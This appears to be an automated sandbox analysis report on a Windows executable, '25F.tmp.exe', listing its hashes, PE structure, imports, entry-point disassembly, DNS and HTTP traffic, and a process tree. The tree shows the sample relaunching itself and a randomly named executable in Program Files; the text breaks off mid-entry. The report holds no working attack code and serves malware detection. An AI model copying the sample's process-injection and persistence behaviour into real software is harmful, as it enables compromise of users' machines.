                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:25F.tmp.exe
                                                                File size:180'224 bytes
                                                                MD5:348ad3e983cccbab62c3648f0bcb0f88
                                                                SHA1:ba39729ea26b32aee01b4dc57e89f7a909bda3b2
                                                                SHA256:9d8445fe53e5494a49bc714ef07ce39b41ad71ea7de73699f0b28bef16bb9da8
                                                                SHA512:930ac3ee36e432d00915bc7cc0ad6a2b9f05864c5433d9181dfe62b7a0f6717a1439312e0a2257411e74e635358c453f8ebff7958cf7d35f263db3506396acff
                                                                SSDEEP:3072:4TlCjY8xvH/4ssKyw5DlVr6X27aqKnnnnnn1ZcqS+atLFwOSr+I2:4Tlf8CMbvKnnnnnnG+uBq+J
                                                                TLSH:4604D05976D25836F4F524BC7F13854EDD367F205F2C9B8FAA298E4E6C689801B0133A
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                Icon Hash:32870e9e8cc61664
                                                                Entrypoint:0x6098f0
                                                                Entrypoint Section:CODE
                                                                Digitally signed:false
                                                                Imagebase:0x600000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                DLL Characteristics:
                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:7da003d8e800bc756c1b5c669773abad
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFF0h
                                                                mov eax, 006098A8h
                                                                call 00007F5EC8E7B80Dh
                                                                call 00007F5EC8E7F1D8h
                                                                call 00007F5EC8E7A2CFh
                                                                mov eax, eax
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc000 | 0x67a | .idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x209a8 | .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf000 | 0xbec | .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xe018 | 0x1e | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0xe000 | 0x18 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                CODE | 0x1000 | 0x890c | 0x8a00 | bd6a05f4be2120dbcef09f646ae8bc30 | False | 0.5860224184782609 | data | 6.429370275870393 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                DATA | 0xa000 | 0x404 | 0x600 | f103e0998158a12d5223843f2763b1da | False | 0.3294270833333333 | data | 2.9582820148833355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                BSS | 0xb000 | 0x7a1 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata | 0xc000 | 0x67a | 0x800 | 3dd5e9c053d01f6a245d1c7c049925ec | False | 0.3603515625 | data | 3.9208704439233952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls | 0xd000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata | 0xe000 | 0x36 | 0x200 | 99b7b1893986074cfaeecaf9d49b77f5 | False | 0.11328125 | data | 0.7311971302589005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                .reloc | 0xf000 | 0xbec | 0xc00 | 129e326df99daca428d64f066aec4c62 | False | 0.7962239583333334 | data | 6.532654370403171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                .rsrc | 0x10000 | 0x20a58 | 0x20c00 | bdd971d47fd507a085ee2df2b7f4b772 | False | 0.8647274570610687 | data | 7.928434086651914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x10ab0 | 0x148 | Device independent bitmap graphic, 8 x 16 x 32, image size 288 | French | Belgium | 0.7682926829268293
RT_STRING | 0x10bf8 | 0x34 | data | | | 0.5
RT_STRING | 0x10c2c | 0xec | data | | | 0.4788135593220339
RT_STRING | 0x10d18 | 0xd0 | data | | | 0.5673076923076923
RT_STRING | 0x10de8 | 0x2ac | data | | | 0.4371345029239766
RT_STRING | 0x11094 | 0x358 | data | | | 0.4158878504672897
RT_STRING | 0x113ec | 0x2b4 | data | | | 0.4060693641618497
RT_RCDATA | 0x116a0 | 0x3c | data | | | 0.9166666666666666
RT_GROUP_ICON | 0x116dc | 0x14 | data | French | Belgium | 1.1
RT_VERSION | 0x116f0 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x12670 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x135f0 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x14570 | 0xf80 | OpenPGP Secret Key | | | 1.0027721774193548
RT_VERSION | 0x154f0 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x16470 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x173f0 | 0xf80 | data | | | 0.8482862903225806
RT_VERSION | 0x18370 | 0xf80 | data | | | 0.3019153225806452
RT_VERSION | 0x192f0 | 0xf80 | data | | | 0.6333165322580645
RT_VERSION | 0x1a270 | 0xf80 | data | | | 0.3878528225806452
RT_VERSION | 0x1b1f0 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x1c170 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x1d0f0 | 0xf80 | data | | | 0.9944556451612904
RT_VERSION | 0x1e070 | 0xf80 | data | | | 0.1743951612903226
RT_VERSION | 0x1eff0 | 0xd | ASCII text, with no line terminators | | | 1.6153846153846154
RT_VERSION | 0x1f000 | 0xf80 | data | | | 0.5922379032258065
RT_VERSION | 0x1ff80 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x20f00 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x21e80 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x22e00 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x23d80 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x24d00 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x25c80 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x26c00 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x27b80 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x28b00 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x29a80 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x2aa00 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x2b980 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x2c900 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x2d880 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x2e800 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x2f780 | 0xf80 | data | | | 1.0027721774193548
RT_VERSION | 0x30700 | 0x1 | very short file (no magic) | | | 9.0
RT_VERSION | 0x30704 | 0x4 | ASCII text, with no line terminators | | | 3.0
RT_VERSION | 0x30708 | 0x2 | ASCII text, with no line terminators | | | 5.0
RT_VERSION | 0x3070c | 0x1 | very short file (no magic) | | | 9.0
RT_VERSION | 0x30710 | 0x1 | very short file (no magic) | | | 9.0
RT_VERSION | 0x30714 | 0x294 | OpenPGP Secret Key | English | United States | 0.4090909090909091
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
kernel32.dll | lstrcmpA, WriteFile, VirtualQuery, LoadLibraryA, GetVersionExA, GetThreadLocale, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetDiskFreeSpaceA, GetCPInfo, GetACP, EnumCalendarInfoA, CloseHandle
user32.dll | CreateWindowExA, MessageBoxA, LoadStringA, GetSystemMetrics, CharNextA, CharToOemA
Language of compilation system | Country where language is spoken
French | Belgium
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 09:04:56.396481037 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Dec 31, 2024 09:04:58.321872950 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Dec 31, 2024 09:05:00.209182978 CET | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Dec 31, 2024 09:05:00.225066900 CET | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Dec 31, 2024 09:05:00.239978075 CET | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Dec 31, 2024 09:05:00.259526014 CET | 49384 | 53 | 192.168.2.22 | 8.8.8.8
Dec 31, 2024 09:05:00.269587040 CET | 53 | 49384 | 8.8.8.8 | 192.168.2.22
Dec 31, 2024 09:05:00.382004976 CET | 54842 | 53 | 192.168.2.22 | 8.8.8.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 09:04:56.396481037 CET | 192.168.2.22 | 8.8.8.8 | 0xc2a | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:04:58.321872950 CET | 192.168.2.22 | 8.8.8.8 | 0x4ab4 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.209182978 CET | 192.168.2.22 | 8.8.8.8 | 0x397c | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.225066900 CET | 192.168.2.22 | 8.8.8.8 | 0x7ad0 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.259526014 CET | 192.168.2.22 | 8.8.8.8 | 0x4bfa | Standard query (0) | code.jquery.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.382004976 CET | 192.168.2.22 | 8.8.8.8 | 0x37fb | Standard query (0) | browser.events.data.msn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 09:04:56.402951002 CET | 8.8.8.8 | 192.168.2.22 | 0xc2a | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 09:04:58.336816072 CET | 8.8.8.8 | 192.168.2.22 | 0x4ab4 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 09:05:00.218363047 CET | 8.8.8.8 | 192.168.2.22 | 0x397c | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 31, 2024 09:05:00.239978075 CET | 8.8.8.8 | 192.168.2.22 | 0x7ad0 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.239978075 CET | 8.8.8.8 | 192.168.2.22 | 0x7ad0 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.239978075 CET | 8.8.8.8 | 192.168.2.22 | 0x7ad0 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.239978075 CET | 8.8.8.8 | 192.168.2.22 | 0x7ad0 | No error (0) | sb.scorecardresearch.com | - | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.269587040 CET | 8.8.8.8 | 192.168.2.22 | 0x4bfa | No error (0) | code.jquery.com | - | 151.101.2.137 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.269587040 CET | 8.8.8.8 | 192.168.2.22 | 0x4bfa | No error (0) | code.jquery.com | - | 151.101.66.137 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.269587040 CET | 8.8.8.8 | 192.168.2.22 | 0x4bfa | No error (0) | code.jquery.com | - | 151.101.194.137 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.269587040 CET | 8.8.8.8 | 192.168.2.22 | 0x4bfa | No error (0) | code.jquery.com | - | 151.101.130.137 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 09:05:00.389281988 CET | 8.8.8.8 | 192.168.2.22 | 0x37fb | No error (0) | browser.events.data.msn.com | global.asimov.events.data.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                • https:
                                                                  • code.jquery.com
                                                                  • sb.scorecardresearch.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49181 | 151.101.2.137 | 443 | 3700 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:05:00 UTC | 314 | OUT | GET /jquery-3.6.3.min.js HTTP/1.1
                                                                Accept: application/javascript, */*;q=0.8
                                                                Referer: https://www.msn.com/?ocid=iehp
                                                                Accept-Language: en-US
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Accept-Encoding: gzip, deflate
                                                                Host: code.jquery.com
                                                                DNT: 1
                                                                Connection: Keep-Alive
2024-12-31 08:05:00 UTC | 612 | IN | HTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89947
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15f5b"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 1185772
                                                                Date: Tue, 31 Dec 2024 08:05:00 GMT
                                                                X-Served-By: cache-lga21985-LGA, cache-ewr-kewr1740035-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 587, 0
                                                                X-Timer: S1735632301.797684,VS0,VE1
                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49175 | 18.244.18.38 | 443 | 3700 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:05:00 UTC | 515 | OUT | GET /b?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                Referer: https://www.msn.com/?ocid=iehp
                                                                Accept-Language: en-US
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Accept-Encoding: gzip, deflate
                                                                Host: sb.scorecardresearch.com
                                                                DNT: 1
                                                                Connection: Keep-Alive
2024-12-31 08:05:01 UTC | 657 | IN | HTTP/1.1 302 Found
                                                                Content-Length: 0
                                                                Connection: close
                                                                Date: Tue, 31 Dec 2024 08:05:01 GMT
                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                Location: /b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                set-cookie: UID=14E06ac0e6e71ba2b029fc21735632301; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                X-Cache: Miss from cloudfront
                                                                Via: 1.1 e4f83d72be7853fbcceb590827a5b68a.cloudfront.net (CloudFront)
                                                                X-Amz-Cf-Pop: FRA56-P11
                                                                X-Amz-Cf-Id: r1MqcoqDGf7o-bo6DaEPtAWJcjVjodwdnLLNiZoW1MW1-stF0UKLEw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49174 | 18.244.18.38 | 443 | 3700 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:05:01 UTC | 516 | OUT | GET /b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                Referer: https://www.msn.com/?ocid=iehp
                                                                Accept-Language: en-US
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Accept-Encoding: gzip, deflate
                                                                Host: sb.scorecardresearch.com
                                                                DNT: 1
                                                                Connection: Keep-Alive
2024-12-31 08:05:01 UTC | 327 | IN | HTTP/1.1 204 No Content
                                                                Connection: close
                                                                Date: Tue, 31 Dec 2024 08:05:01 GMT
                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                X-Cache: Miss from cloudfront
                                                                Via: 1.1 abf6c055b398b223d7325958955066c0.cloudfront.net (CloudFront)
                                                                X-Amz-Cf-Pop: FRA56-P11
                                                                X-Amz-Cf-Id: hRT2YiJJ7khZBqyu1pxPMRUgxZqddWBxpUKrxiD8dsarhUveBPLbCw==


Target ID: 0
Start time: 03:04:33
Start date: 31/12/2024
Path: C:\Users\user\Desktop\25F.tmp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\25F.tmp.exe"
Imagebase: 0x600000
File size: 180'224 bytes
MD5 hash: 348AD3E983CCCBAB62C3648F0BCB0F88
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:04:43
Start date: 31/12/2024
Path: C:\Users\user\Desktop\25F.tmp.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\25F.tmp.exe
Imagebase: 0x600000
File size: 180'224 bytes
MD5 hash: 348AD3E983CCCBAB62C3648F0BCB0F88
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 03:04:44
Start date: 31/12/2024
Path: C:\Windows\notepad.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\notepad.exe"
Imagebase: 0xff820000
File size: 193'536 bytes
MD5 hash: B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 4
Start time: 03:04:44
Start date: 31/12/2024
Path: C:\Users\user\Desktop\25F.tmp.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\25F.tmp.exe
Imagebase: 0x600000
File size: 180'224 bytes
MD5 hash: 348AD3E983CCCBAB62C3648F0BCB0F88
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                Target ID:5
                                                                Start time:03:04:47
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                Imagebase:0x880000
                                                                File size:815'304 bytes
                                                                MD5 hash:8A590F790A98F3D77399BE457E01386A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:03:04:47
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                                                Imagebase:0x13f530000
                                                                File size:814'288 bytes
                                                                MD5 hash:4EB098135821348270F27157F7A84E65
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0xa70000
                                                                File size:355'328 bytes
                                                                MD5 hash:54B7C43C2E89F5CE71B2C255C1CF35E2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:10
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:12
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:13
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
